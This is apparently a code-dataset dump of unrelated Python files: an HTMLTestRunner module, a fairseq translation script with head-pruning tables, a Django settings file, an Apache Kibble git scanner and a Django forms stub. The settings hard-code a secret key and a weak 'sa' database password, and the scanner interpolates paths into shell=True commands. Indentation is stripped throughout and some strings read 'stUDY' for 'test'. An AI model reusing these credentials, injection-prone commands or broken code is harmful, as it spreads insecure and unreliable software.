sys.stderr.write(str(test))
sys.stderr.write('\n')
else:
sys.stderr.write('.')
def addError(self, test, err):
self.error_count += 1
TestResult.addError(self, test, err)
_, _exc_str = self.errors[-1]
output = self.complete_output()
self.result.append((2, test, output, _exc_str))
if self.verbosity > 1:
sys.stderr.write('E ')
sys.stderr.write(str(test))
sys.stderr.write('\n')
else:
sys.stderr.write('E')
def addFailure(self, test, err):
self.failure_count += 1
TestResult.addFailure(self, test, err)
_, _exc_str = self.failures[-1]
output = self.complete_output()
self.result.append((1, test, output, _exc_str))
if self.verbosity > 1:
sys.stderr.write('F ')
sys.stderr.write(str(test))
sys.stderr.write('\n')
else:
sys.stderr.write('F')
class HTMLTestRunner(Template_mixin):
"""
"""
def __init__(self, stream=sys.stdout, verbosity=1,title=None,description=None,tester=None):
self.stream = stream
self.verbosity = verbosity
if title is None:
self.title = self.DEFAULT_TITLE
else:
self.title = title
if description is None:
self.description = self.DEFAULT_DESCRIPTION
else:
self.description = description
if tester is None:
self.tester = self.DEFAULT_TESTER
else:
self.tester = tester
self.startTime = datetime.datetime.now()
def run(self, test):
"Run the given stUDY case or stUDY suite."
result = _TestResult(self.verbosity)
test(result)
self.stopTime = datetime.datetime.now()
self.generateReport(test, result)
print('\nTime Elapsed: %s' % (self.stopTime-self.startTime), file=sys.stderr)
return result
def sortResult(self, result_list):
# unittest does not seems to run in any particular order.
# Here at least we want to group them together by class.
rmap = {}
classes = []
for n,t,o,e in result_list:
cls = t.__class__
if cls not in rmap:
rmap[cls] = []
classes.append(cls)
rmap[cls].append((n,t,o,e))
r = [(cls, rmap[cls]) for cls in classes]
return r
#替换测试结果status为通过率 --Findyou
def getReportAttributes(self, result):
"""
Return report attributes as a list of (name, value).
Override this to add custom attributes.
"""
startTime = str(self.startTime)[:19]
duration = str(self.stopTime - self.startTime)
status = []
status.append('共 %s' % (result.success_count + result.failure_count + result.error_count))
if result.success_count: status.append('通过 %s' % result.success_count)
if result.failure_count: status.append('失败 %s' % result.failure_count)
if result.error_count: status.append('错误 %s' % result.error_count )
if status:
status = ','.join(status)
self.passrate = str("%.2f%%" % (float(result.success_count) / float(result.success_count + result.failure_count + result.error_count) * 100))
else:
status = 'none'
return [
('测试人员', self.tester),
('开始时间',startTime),
('合计耗时',duration),
('测试结果',status + ",通过率= "+self.passrate),
]
def generateReport(self, test, result):
report_attrs = self.getReportAttributes(result)
generator = 'HTMLTestRunner %s' % __version__
stylesheet = self._generate_stylesheet()
heading = self._generate_heading(report_attrs)
report = self._generate_report(result)
ending = self._generate_ending()
output = self.HTML_TMPL % dict(
title = saxutils.escape(self.title),
generator = generator,
stylesheet = stylesheet,
heading = heading,
report = report,
ending = ending,
)
self.stream.write(output.encode('utf8'))
def _generate_stylesheet(self):
return self.STYLESHEET_TMPL
#增加Tester显示 -Findyou
def _generate_heading(self, report_attrs):
a_lines = []
for name, value in report_attrs:
line = self.HEADING_ATTRIBUTE_TMPL % dict(
name = saxutils.escape(name),
value = saxutils.escape(value),
)
a_lines.append(line)
heading = self.HEADING_TMPL % dict(
title = saxutils.escape(self.title),
parameters = ''.join(a_lines),
description = saxutils.escape(self.description),
tester= saxutils.escape(self.tester),
)
return heading
#生成报告 --Findyou添加注释
def _generate_report(self, result):
rows = []
sortedResult = self.sortResult(result.result)
for cid, (cls, cls_results) in enumerate(sortedResult):
# subtotal for a class
np = nf = ne = 0
for n,t,o,e in cls_results:
if n == 0: np += 1
elif n == 1: nf += 1
else: ne += 1
# format class description
if cls.__module__ == "__main__":
name = cls.__name__
else:
name = "%s.%s" % (cls.__module__, cls.__name__)
doc = cls.__doc__ and cls.__doc__.split("\n")[0] or ""
desc = doc and '%s: %s' % (name, doc) or name
row = self.REPORT_CLASS_TMPL % dict(
style = ne > 0 and 'errorClass' or nf > 0 and 'failClass' or 'passClass',
desc = desc,
count = np+nf+ne,
Pass = np,
fail = nf,
error = ne,
cid = 'c%s' % (cid+1),
)
rows.append(row)
for tid, (n,t,o,e) in enumerate(cls_results):
self._generate_report_test(rows, cid, tid, n, t, o, e)
report = self.REPORT_TMPL % dict(
test_list = ''.join(rows),
count = str(result.success_count+result.failure_count+result.error_count),
Pass = str(result.success_count),
fail = str(result.failure_count),
error = str(result.error_count),
passrate =self.passrate,
)
return report
def _generate_report_test(self, rows, cid, tid, n, t, o, e):
#o print的内容
#e 抛出的异常信息
#t 具体的测试用例情况
# e.g. 'pt1.1', 'ft1.1', etc
has_output = bool(o or e)
#当有print输入或者有异常抛出时都采用REPORT_TEST_WITH_OUTPUT_TMPL
#has_output = bool(o and e)
# ID修改点为下划线,支持Bootstrap折叠展开特效 - Findyou
tid = (n == 0 and 'p' or 'f') + 't%s_%s' % (cid+1,tid+1)
#tid = '%s_%s' % (cid+1,tid+1)
name = t.id().split('.')[-1]
doc = t.shortDescription() or ""
desc = doc and ('%s: %s' % (name, doc)) or name
tmpl = has_output and self.REPORT_TEST_WITH_OUTPUT_TMPL or self.REPORT_TEST_NO_OUTPUT_TMPL
# utf-8 支持中文 - Findyou
# o and e should be byte string because they are collected from stdout and stderr?
if isinstance(o, str):
# TODO: some problem with 'string_escape': it escape \n and mess up formating
# uo = unicode(o.encode('string_escape'))
# uo = o.decode('latin-1')
uo = o
else:
uo = o
if isinstance(e, str):
# TODO: some problem with 'string_escape': it escape \n and mess up formating
# ue = unicode(e.encode('string_escape'))
# ue = e.decode('latin-1')
ue = e
else:
ue = e
# 插入图片
unum = str(uo).find('screenshots')
if (uo and unum != -1):
hidde_status = ''
#image_url = 'file:///'+uo
image_url = '../report/screenshots/' + str(uo)[unum + 11:unum + 36].replace(' ', '')
else:
hidde_status = '''hidden="hidden"'''
image_url = ''
script = self.REPORT_TEST_OUTPUT_TMPL % dict(
id = tid[2:],
#output = saxutils.escape(uo+ue),
output = saxutils.escape(ue),
hidde=hidde_status,
image=image_url,
)
row = tmpl % dict(
tid = tid,
Class = (n == 0 and 'hiddenRow' or 'none'),
style = n == 2 and 'errorCase' or (n == 1 and 'failCase' or 'passCase'),
desc = desc,
script = script,
hidde = hidde_status,
image = image_url,
status = self.STATUS[n],
)
rows.append(row)
if not has_output:
return
def _generate_ending(self):
return self.ENDING_TMPL
##############################################################################
# Facilities for running tests from the command line
##############################################################################
# Note: Reuse unittest.TestProgram to launch stUDY. In the future we may
# build our own launcher to support more specific command line
# parameters like stUDY title, CSS, etc.
class TestProgram(unittest.TestProgram):
"""
A variation of the unittest.TestProgram. Please refer to the base
class for command line parameters.
"""
def runTests(self):
# Pick HTMLTestRunner as the default stUDY runner.
# base class's testRunner parameter is not useful because it means
# we have to instantiate HTMLTestRunner before we know self.verbosity.
if self.testRunner is None:
self.testRunner = HTMLTestRunner(verbosity=self.verbosity)
unittest.TestProgram.runTests(self)
main = TestProgram
##############################################################################
# Executing this module from the command line
##############################################################################
if __name__ == "__main__":
main(module=None)
|
[
"1259917952@qq.com"
] |
1259917952@qq.com
|
f555f4db1b57f5a3fdb41deb28cc1c6151bd4ea2
|
6cde76beabb943b4de4ab9f7516ebffca51f6da6
|
/generate.py
|
ea8517289fa84e335e308416701d7c7449ebf6f2
|
[] |
no_license
|
A1exRey/ReflectionOfNAR
|
801bf23eb098f03e663f89f553355f43eb6a7d9e
|
79ed86873322d45cbfc28f98a4e224c961d5bad2
|
refs/heads/main
| 2023-05-13T23:00:54.703916
| 2021-06-01T11:01:02
| 2021-06-01T11:01:02
| 372,795,504
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 10,600
|
py
|
#!/usr/bin/env python3 -u
# Copyright (c) 2017-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the license found in the LICENSE file in
# the root directory of this source tree. An additional grant of patent rights
# can be found in the PATENTS file in the same directory.
"""
Translate pre-processed data with a trained model.
"""
import torch
from fairseq import bleu, checkpoint_utils, options, progress_bar, tasks, utils
from fairseq.meters import StopwatchMeter, TimeMeter
import re
from interactive import translate_corpus, parse_head_pruning_descriptors, mask_heads
def main(args):
assert args.path is not None, '--path required for generation!'
assert not args.sampling or args.nbest == args.beam, \
'--sampling requires --nbest to be equal to --beam'
assert args.replace_unk is None or args.raw_text, \
'--replace-unk requires a raw text dataset (--raw-text)'
utils.import_user_module(args)
if args.max_tokens is None and args.max_sentences is None:
args.max_tokens = 12000
print(args)
use_cuda = torch.cuda.is_available() and not args.cpu
# Load dataset splits
task = tasks.setup_task(args)
task.load_dataset(args.gen_subset)
# Set dictionaries
try:
src_dict = getattr(task, 'source_dictionary', None)
except NotImplementedError:
src_dict = None
tgt_dict = task.target_dictionary
# Load ensemble
print('| loading model(s) from {}'.format(args.path))
models, _model_args = checkpoint_utils.load_model_ensemble(
args.path.split(':'),
arg_overrides=eval(args.model_overrides),
task=task,
)
to_prune = {'E': {}, 'A': {}, 'D': {}}
to_prune = {'E': {0: {0, 1, 2, 3, 4, 5, 6, 7}, 1: {2, 4, 7}, 2: {3}}, 'A': {}, 'D': {}}
to_prune = {'E': {0: {0, 1, 2, 3, 4, 5, 6, 7}, 1: {2, 4, 7}, 2: {3, 7}, 4: {0, 3, 7}, 5: {0, 7}, 11: {2, 5}, 6: {0}, 9: {3}, 3: {0}}, 'A': {}, 'D': {}}
to_prune = {'E': {0: {0, 1, 2, 3, 4, 5, 6, 7}, 1: {0, 1, 2, 4, 6, 7}, 2: {3, 5, 7}, 3: {0, 1, 4}, 4: {0, 2, 3, 7}, 5: {0, 7}, 6: {0, 1}, 9: {3}, 11: {2, 5}, 10: {0, 3}}, 'A': {0: {1}}, 'D': {}}
to_prune = {'E': {0: {0, 1, 2, 3, 4, 5, 6, 7}, 1: {0, 1, 2, 4, 6, 7}, 2: {3, 5, 7}, 3: {0, 1, 4, 6}, 4: {0, 2, 3, 7}, 5: {0, 3, 7}, 6: {0, 1, 2}, 9: {1, 3, 6}, 10: {0, 3, 5}, 11: {2, 5, 7}, 8: {3, 4, 5, 7}}, 'A': {0: {1}}, 'D': {}}
to_prune = {'E': {0: {0, 1, 2, 3, 4, 5, 6, 7}, 1: {0, 1, 2, 4, 5, 6, 7}, 2: {0, 3, 5, 7}, 3: {0, 1, 4, 5, 6}, 4: {0, 1, 2, 3, 7}, 5: {0, 2, 3, 4, 5, 7}, 6: {0, 1, 2, 3, 6}, 8: {3, 4, 5, 7}, 9: {1, 3, 6}, 10: {0, 3, 5}, 11: {2, 5, 7}, 7: {2, 4}}, 'A': {0: {1}}, 'D': {}}
to_prune = {'E': {0: {0, 1, 2, 3, 4, 5, 6, 7}, 1: {0, 1, 2, 4, 5, 6, 7}, 2: {0, 2, 3, 4, 5, 6, 7}, 3: {0, 1, 4, 5, 6}, 4: {0, 1, 2, 3, 6, 7}, 5: {0, 2, 3, 4, 5, 7}, 6: {0, 1, 2, 3, 6}, 7: {2, 4, 6}, 8: {0, 3, 4, 5, 6, 7}, 9: {1, 3, 6}, 10: {0, 1, 3, 5, 7}, 11: {0, 2, 5, 7}}, 'A': {0: {1}}, 'D': {0: {1, 4}}}
to_prune = {'E': {0: {0, 1, 2, 3, 4, 5, 6, 7}, 1: {0, 1, 2, 3, 4, 5, 6, 7}, 2: {0, 2, 3, 4, 5, 6, 7}, 3: {0, 1, 3, 4, 5, 6, 7}, 4: {0, 1, 2, 3, 4, 5, 6, 7}, 5: {0, 2, 3, 4, 5, 6, 7}, 6: {0, 1, 2, 3, 6, 7}, 7: {0, 2, 3, 4, 6}, 8: {0, 3, 4, 5, 6, 7}, 9: {1, 2, 3, 6, 7}, 10: {0, 1, 3, 5, 7}, 11: {0, 2, 5, 7}}, 'A': {0: {1}}, 'D': {0: {1, 4}}}
to_prune = {'E': {0: {0, 1, 2, 3, 4, 5, 6, 7}, 1: {0, 1, 2, 3, 4, 5, 6, 7}, 2: {0, 1, 2, 3, 4, 5, 6, 7}, 3: {0, 1, 3, 4, 5, 6, 7}, 4: {0, 1, 2, 3, 4, 5, 6, 7}, 5: {0, 1, 2, 3, 4, 5, 6, 7}, 6: {0, 1, 2, 3, 5, 6, 7}, 7: {0, 2, 3, 4, 6, 7}, 8: {0, 1, 3, 4, 5, 6, 7}, 9: {1, 2, 3, 6, 7}, 10: {0, 1, 2, 3, 5, 7}, 11: {0, 2, 5, 6, 7}}, 'A': {0: {1, 4, 7}}, 'D': {0: {0, 1, 4, 7}}}
#to_prune = {'E': {0: {0, 1, 2, 3, 4, 5, 6, 7}, 1: {0, 1, 2, 3, 4, 5, 6, 7}, 2: {0, 1, 2, 3, 4, 5, 6, 7}, 3: {0, 1, 2, 3, 4, 5, 6, 7}, 4: {0, 1, 2, 3, 4, 5, 6, 7}, 5: {0, 1, 2, 3, 4, 5, 6, 7}, 6: {0, 1, 2, 3, 4, 5, 6, 7}, 7: {0, 2, 3, 4, 5, 6, 7}, 8: {0, 1, 2, 3, 4, 5, 6, 7}, 9: {1, 2, 3, 4, 5, 6, 7}, 10: {0, 1, 2, 3, 5, 7}, 11: {0, 2, 5, 6, 7}}, 'A': {0: {0, 1, 2, 3, 4, 5, 6, 7}}, 'D': {0: {0, 1, 4, 7}}}
# Optimize ensemble for generation
for model in models:
mask_heads(model, to_prune, False)
model.make_generation_fast_(
beamable_mm_beam_size=None if args.no_beamable_mm else args.beam,
need_attn=args.print_alignment,
)
if args.fp16:
model.half()
if use_cuda:
model.cuda()
# Load alignment dictionary for unknown word replacement
# (None if no unknown word replacement, empty if no path to align dictionary)
align_dict = utils.load_align_dict(args.replace_unk)
# Load dataset (possibly sharded)
itr = task.get_batch_iterator(
dataset=task.dataset(args.gen_subset),
max_tokens=args.max_tokens,
max_sentences=args.max_sentences,
max_positions=utils.resolve_max_positions(
task.max_positions(),
*[model.max_positions() for model in models]
),
ignore_invalid_inputs=args.skip_invalid_size_inputs_valid_test,
required_batch_size_multiple=args.required_batch_size_multiple,
num_shards=args.num_shards,
shard_id=args.shard_id,
num_workers=args.num_workers,
).next_epoch_itr(shuffle=False)
# Initialize generator
gen_timer = StopwatchMeter()
generator = task.build_generator(models,args)
# Generate and compute BLEU score
if args.sacrebleu:
scorer = bleu.SacrebleuScorer()
else:
scorer = bleu.Scorer(tgt_dict.pad(), tgt_dict.eos(), tgt_dict.unk())
num_sentences = 0
has_target = True
with progress_bar.build_progress_bar(args, itr) as t:
wps_meter = TimeMeter()
for sample in t:
sample = utils.move_to_cuda(sample) if use_cuda else sample
if 'net_input' not in sample:
continue
prefix_tokens = None
if args.prefix_size > 0:
prefix_tokens = sample['target'][:, :args.prefix_size]
gen_timer.start()
hypos = task.inference_step(generator, models, sample, prefix_tokens)
num_generated_tokens = sum(len(h[0]['tokens']) for h in hypos)
gen_timer.stop(num_generated_tokens)
for i, sample_id in enumerate(sample['id'].tolist()):
has_target = sample['target'] is not None
# Remove padding
src_tokens = utils.strip_pad(sample['net_input']['src_tokens'][i, :], tgt_dict.pad())
target_tokens = None
if has_target:
target_tokens = utils.strip_pad(sample['target'][i, :], tgt_dict.pad()).int().cpu()
# Either retrieve the original sentences or regenerate them from tokens.
if align_dict is not None:
src_str = task.dataset(args.gen_subset).src.get_original_text(sample_id)
target_str = task.dataset(args.gen_subset).tgt.get_original_text(sample_id)
else:
if src_dict is not None:
src_str = src_dict.string(src_tokens, args.remove_bpe)
else:
src_str = ""
if has_target:
target_str = tgt_dict.string(target_tokens, args.remove_bpe, escape_unk=True)
if not args.quiet:
if src_dict is not None:
print('S-{}\t{}'.format(sample_id, src_str))
if has_target:
print('T-{}\t{}'.format(sample_id, target_str))
# Process top predictions
for j, hypo in enumerate(hypos[i][:args.nbest]):
hypo_tokens, hypo_str, alignment = utils.post_process_prediction(
hypo_tokens=hypo['tokens'].int().cpu(),
src_str=src_str,
alignment=hypo['alignment'].int().cpu() if hypo['alignment'] is not None else None,
align_dict=align_dict,
tgt_dict=tgt_dict,
remove_bpe=args.remove_bpe,
)
if not args.quiet:
print('H-{}\t{}\t{}'.format(sample_id, hypo['score'], hypo_str))
print('P-{}\t{}'.format(
sample_id,
' '.join(map(
lambda x: '{:.4f}'.format(x),
hypo['positional_scores'].tolist(),
))
))
if args.print_alignment:
print('A-{}\t{}'.format(
sample_id,
' '.join(map(lambda x: str(utils.item(x)), alignment))
))
# Score only the top hypothesis
if has_target and j == 0:
if align_dict is not None or args.remove_bpe is not None:
# Convert back to tokens for evaluation with unk replacement and/or without BPE
target_tokens = tgt_dict.encode_line(target_str, add_if_not_exist=True)
if hasattr(scorer, 'add_string'):
if args.dehyphenate:
print('dehyphenating')
target_str = dehyphenate(target_str)
hypo_str = dehyphenate(hypo_str)
scorer.add_string(target_str, hypo_str)
else:
scorer.add(target_tokens, hypo_tokens)
wps_meter.update(num_generated_tokens)
t.log({'wps': round(wps_meter.avg)})
num_sentences += sample['nsentences']
print('| Translated {} sentences ({} tokens) in {:.1f}s ({:.2f} sentences/s, {:.2f} tokens/s)'.format(
num_sentences, gen_timer.n, gen_timer.sum, num_sentences / gen_timer.sum, 1. / gen_timer.avg))
if has_target:
print('| Generate {} with beam={}: {}'.format(args.gen_subset, args.beam, scorer.result_string()))
return scorer
def cli_main():
parser = options.get_generation_parser()
args = options.parse_args_and_arch(parser)
main(args)
def dehyphenate(sent):
return re.sub(r'(\S)-(\S)', r'\1 ##AT##-##AT## \2', sent).replace('##AT##', '@')
if __name__ == '__main__':
cli_main()
|
[
"noreply@github.com"
] |
A1exRey.noreply@github.com
|
dec10d527a3cc3635dbf388df8da39c4076d1195
|
aecf94d703af89b2d93d8fe84576da045f9f61f7
|
/mysite/settings.py
|
9d1eb43125cd0cd6f1ea0fe6090d8d9e6d6c1f46
|
[] |
no_license
|
ikkun/django_web
|
839104e9735589e7d28fa3cb6abd3fe8e869a52e
|
8bf04c01a82f0c82bd17aefda1ddf437fae4f670
|
refs/heads/master
| 2020-08-28T08:51:40.861625
| 2020-02-23T04:11:00
| 2020-02-23T04:11:00
| 217,651,771
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,692
|
py
|
"""
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 2.2.5.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'a!z-ghwrur8-h#lf(tyokmbn-x15x%og3%a4$b321a-&i94-pt'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
TINYMCE_DEFAULT_CONFIG = {
'height': 360,
'width': 1120,
'cleanup_on_startup': True,
'custom_undo_redo_levels': 20,
'selector': 'textarea',
'theme': 'modern',
'plugins': '''
textcolor save link image media preview codesample contextmenu
table code lists fullscreen insertdatetime nonbreaking
contextmenu directionality searchreplace wordcount visualblocks
visualchars code fullscreen autolink lists charmap print hr
anchor pagebreak
''',
'toolbar1': '''
fullscreen preview bold italic underline | fontselect,
fontsizeselect | forecolor backcolor | alignleft alignright |
aligncenter alignjustify | indent outdent | bullist numlist table |
| link image media | codesample |
''',
'toolbar2': '''
visualblocks visualchars |
charmap hr pagebreak nonbreaking anchor | code |
''',
'contextmenu': 'formats | link image',
'menubar': True,
'statusbar': True,
}
INSTALLED_APPS = [
'main.apps.MainConfig',
'programming.apps.ProgrammingConfig',
'budget.apps.BudgetConfig',
'blog.apps.BlogConfig',
'users.apps.UsersConfig',
'core.apps.CoreConfig',
'secmgr',
'socalert',
'todo',
'tinymce',
'crispy_forms',
'rest_framework',
'rest_framework.authtoken',
'rest_auth',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
# DATABASES = {
# 'default': {
# 'ENGINE': 'django.db.backends.sqlite3',
# 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
# }
# }
DATABASES = {
'default': {
'ENGINE': 'sql_server.pyodbc',
'NAME': 'tutorial',
'USER': 'sa',
'PASSWORD': 'password123',
'HOST': '127.0.0.1\sqlexpress',
# 'PORT': '1433',
'OPTIONS': {
'driver': 'ODBC Driver 13 for SQL Server',
},
},
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'ASIA/BANGKOK'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
MEDIA_ROOT = os.path.join(BASE_DIR,'media')
MEDIA_URL = '/media/'
CRISPY_TEMPLATE_PACK = 'bootstrap4'
LOGIN_REDIRECT_URL = 'blog-home'
LOGIN_URL = 'login'
REST_FRAMEWORK = {
# 'DEFAULT_AUTHENTICATION_CLASSES': [
# 'rest_framework.authentication.TokenAuthentication'
# ],
'DEFAULT_RENDERER_CLASSES': (
#UnicodeJSONRenderer has an ensure_ascii = False attribute,
#thus it will not escape characters.
'rest_framework.renderers.UnicodeJSONRenderer',
#You only need to keep this one if you're using the browsable API
'rest_framework.renderers.BrowsableAPIRenderer',
),
'DEFAULT_PERMISSION_CLASSES':[
'rest_framework.permissions.IsAuthenticated'
],
'DEFAULT_AUTHENTICATION_CLASSES': [
'rest_framework_simplejwt.authentication.JWTAuthentication'
],
}
|
[
"ikkunanny@gmail.com"
] |
ikkunanny@gmail.com
|
d670fc71f610fb31b49e00a8c5c71b54ca6ed4ef
|
83a59e255f681e85828399c6c2323f2cf0997e10
|
/kibble/scanners/scanners/git-evolution.py
|
8f4a83698faccdae147d2985f32bfb605884f6ff
|
[
"Apache-2.0",
"BSD-3-Clause",
"MIT"
] |
permissive
|
kaxil/kibble
|
f4ab6f1039086adcb37c544c60bbbc27e8538128
|
96959acec06fed4d91d5da73fee1aa1200ffbb3c
|
refs/heads/main
| 2023-02-01T03:14:53.813091
| 2020-12-16T23:04:45
| 2020-12-16T23:04:45
| 320,881,184
| 1
| 0
|
Apache-2.0
| 2020-12-12T17:04:54
| 2020-12-12T17:04:54
| null |
UTF-8
|
Python
| false
| false
| 8,447
|
py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
""" Git Evolution scanner """
import calendar
import datetime
import hashlib
import os
import subprocess
import time
from kibble.configuration import conf
from kibble.scanners.utils import sloc
title = "Git Evolution Scanner"
version = "0.1.0"
def accepts(source):
""" Do we accept this source? """
if source["type"] == "git":
return True
# There are cases where we have a github repo, but don't wanna analyze the code, just issues
if source["type"] == "github" and source.get("issuesonly", False) == False:
return True
return False
def get_first_ref(gpath):
try:
return subprocess.check_output(
"cd %s && git log `git rev-list --max-parents=0 HEAD` --pretty=format:%%ct"
% gpath,
shell=True,
)
except: # pylint: disable=bare-except
print("Could not get first ref, exiting!")
return None
def acquire(kibble_bit, source):
source["steps"]["evolution"] = {
"time": time.time(),
"status": "Evolution scan started at "
+ time.strftime("%a, %d %b %Y %H:%M:%S +0000", time.gmtime()),
"running": True,
"good": True,
}
kibble_bit.update_source(source)
def release(kibble_bit, source, status, exception=None, good=False):
source["steps"]["evolution"] = {
"time": time.time(),
"status": status,
"running": False,
"good": good,
}
if exception:
source["steps"]["evolution"].update({"exception": exception})
kibble_bit.update_source(source)
def check_branch(gpath, date, branch):
try:
subprocess.check_call(
'cd %s && git rev-list -n 1 --before="%s" %s' % (gpath, date, branch),
shell=True,
)
return True
except: # pylint: disable=bare-except
return False
def checkout(gpath, date, branch):
# print("Ready to cloc...checking out %s " % date)
try:
ref = (
subprocess.check_output(
'cd %s && git rev-list -n 1 --before="%s" "%s"' % (gpath, date, branch),
shell=True,
stderr=subprocess.STDOUT,
)
.decode("ascii", "replace")
.strip()
)
subprocess.check_output(
"cd %s && git checkout %s -- " % (gpath, ref),
shell=True,
stderr=subprocess.STDOUT,
)
except subprocess.CalledProcessError as err:
print(err.output)
def find_branch(date, gpath):
try:
os.chdir(gpath)
subprocess.check_call(
'cd %s && git rev-list -n 1 --before="%s" master' % (gpath, date),
shell=True,
stderr=subprocess.DEVNULL,
)
return "master"
except: # pylint: disable=bare-except
os.chdir(gpath)
try:
return (
subprocess.check_output(
"cd %s && git rev-parse --abbrev-ref HEAD" % gpath,
shell=True,
stderr=subprocess.DEVNULL,
)
.decode("ascii", "replace")
.strip()
.strip("* ")
)
except: # pylint: disable=bare-except
# print("meh! no branch")
return None
def scan(kibble_bit, source):
rid = source["sourceID"]
rootpath = "%s/%s/git" % (
conf.get("scanner", "scratchdir"),
source["organisation"],
)
gpath = os.path.join(rootpath, rid)
gname = source["sourceID"]
kibble_bit.pprint("Doing evolution scan of %s" % gname)
inp = get_first_ref(gpath)
if inp:
ts = int(inp.split()[0])
ts -= ts % 86400
date = time.strftime("%Y-%b-%d 0:00", time.gmtime(ts))
# print("Starting from %s" % date)
now = time.time()
rid = source["sourceID"]
url = source["sourceURL"]
rootpath = "%s/%s/git" % (
conf.get("scanner", "scratchdir"),
source["organisation"],
)
gpath = os.path.join(rootpath, rid)
if source["steps"]["sync"]["good"] and os.path.exists(gpath):
acquire(kibble_bit, source)
branch = find_branch(date, gpath)
if not branch:
release(
source,
"Could not do evolutionary scan of code",
"No default branch was found in this repository",
)
return
branch_exists = check_branch(gpath, date, branch)
if not branch_exists:
kibble_bit.pprint("Not trunk either (bad repo?), skipping")
release(
source,
"Could not do evolutionary scan of code",
"No default branch was found in this repository",
)
return
try:
d = time.gmtime(now)
year = d[0]
quarter = d[1] - (d[1] % 3)
if quarter <= 0:
quarter += 12
year -= 1
while now > ts:
pd = (
datetime.datetime(year, quarter, 1)
.replace(tzinfo=datetime.timezone.utc)
.timetuple()
)
date = time.strftime("%Y-%b-%d 0:00", pd)
unix = calendar.timegm(pd)
# Skip the dates we've already processed
dhash = hashlib.sha224(
(source["sourceID"] + date).encode("ascii", "replace")
).hexdigest()
found = kibble_bit.exists("evolution", dhash)
if not found:
checkout(gpath, date, branch)
kibble_bit.pprint(
"Running cloc on %s (%s) at %s"
% (gname, source["sourceURL"], date)
)
languages, codecount, comment, blank, years, cost = sloc.count(
gpath
)
js = {
"time": unix,
"sourceID": source["sourceID"],
"sourceURL": source["sourceURL"],
"organisation": source["organisation"],
"loc": codecount,
"comments": comment,
"blank": blank,
"years": years,
"cost": cost,
"languages": languages,
}
kibble_bit.index("evolution", dhash, js)
quarter -= 3
if quarter <= 0:
quarter += 12
year -= 1
# decrease month by 3
now = time.mktime(datetime.date(year, quarter, 1).timetuple())
except Exception as e:
kibble_bit.pprint(e)
release(
kibble_bit,
source,
"Evolution scan failed at "
+ time.strftime("%a, %d %b %Y %H:%M:%S +0000", time.gmtime()),
str(e),
)
return
release(
kibble_bit,
source,
"Evolution scan completed at "
+ time.strftime("%a, %d %b %Y %H:%M:%S +0000", time.gmtime()),
good=True,
)
|
[
"noreply@github.com"
] |
kaxil.noreply@github.com
|
7918dfa9b23e9132b0e9ee1227ce130b85ce717a
|
4dbb4e1c3e3c5c0471150cba23fbfb9592fbf1f4
|
/accounts/forms.py
|
1cf25e666b098a830eeb81df420fd1a842233215
|
[] |
no_license
|
OwenCookman/owen-webdev
|
745f0c4a1735f4ce084c2094ab2425d3ca4ca925
|
9a912ba47a09597d0069884f0d603806d955cbe3
|
refs/heads/master
| 2021-09-29T10:46:37.210443
| 2021-06-21T12:46:29
| 2021-06-21T12:46:29
| 251,331,742
| 0
| 0
| null | 2021-09-22T18:50:34
| 2020-03-30T14:33:54
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 1,415
|
py
|
from django import forms
from django.contrib.auth.models import User
from django.contrib.auth.forms import UserCreationForm
from django.core.exceptions import ValidationError
class UserLoginForm(forms.Form):
"""The form used to log in users"""
username = forms.CharField()
password = forms.CharField(widget=forms.PasswordInput)
class UserRegistrationForm(UserCreationForm):
"""The form used to register a new user"""
